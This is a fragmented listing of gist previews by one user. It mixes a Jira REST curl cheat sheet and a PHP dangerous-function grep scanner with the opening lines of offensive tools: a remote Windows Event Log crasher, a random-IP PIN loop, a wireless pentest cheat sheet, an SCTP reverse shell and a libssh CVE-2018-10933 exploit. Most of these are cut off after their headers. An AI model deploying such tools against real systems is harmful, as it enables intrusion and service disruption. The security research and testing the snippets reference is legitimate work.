ricardojba

# Crash the Windows Event Log Service remotely, needs Admin privs
# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
#
# Once the service crashes 3 times it will not restart for 24 hours
#
# https://github.com/limbenjamin/LogServiceCrash
# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
#
# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

ricardojba

#!/bin/bash

while :; do

    verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
    pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)

    ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")

ricardojba

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

• Open the Monitor Mode

root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up

ricardojba

#!/bin/bash

P="*"

if [ -n "$1" ]; then
	P="$1"
fi

grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s

ricardojba

JIRA_REST_URL="${JIRA_REST_URL:-https://MYCOMPANY.jira.com/rest/api/2}"
JIRA_CREDENTIALS="${JIRA_CREDENTIALS:-user:password}"

# https://developer.atlassian.com/jiradev/api-reference/jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-discovering-meta-data-for-creating-issues

# https://MYCOMPANY.jira.com/rest/api/2/issue/createmeta?projectKeys=MYPROJ&issuetypeNames=MyIssueType&expand=projects.issuetypes.fields
# customfield_10171: My Custom Field Name 1
# customfield_10172: My Custom Field Name 2

# This methods create a new issue of type 'MyIssueType' in project 'MYPROJ' with 2 custom fields

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?

#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information on an issue
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345

#Adds a comment to an existing issue
curl -D- -u uname:pass -X PUT -d "{\"update\": {\"comment\": [{\"add\": {\"body\": \"Comment added when resolving issue\"}}]}}" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345

#Transitions an issue

ricardojba

#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/

#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?

#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'

ricardojba

#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`

import os, socket, subprocess

RHOST = '127.0.0.1'
RPORT = 1234

ricardojba

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8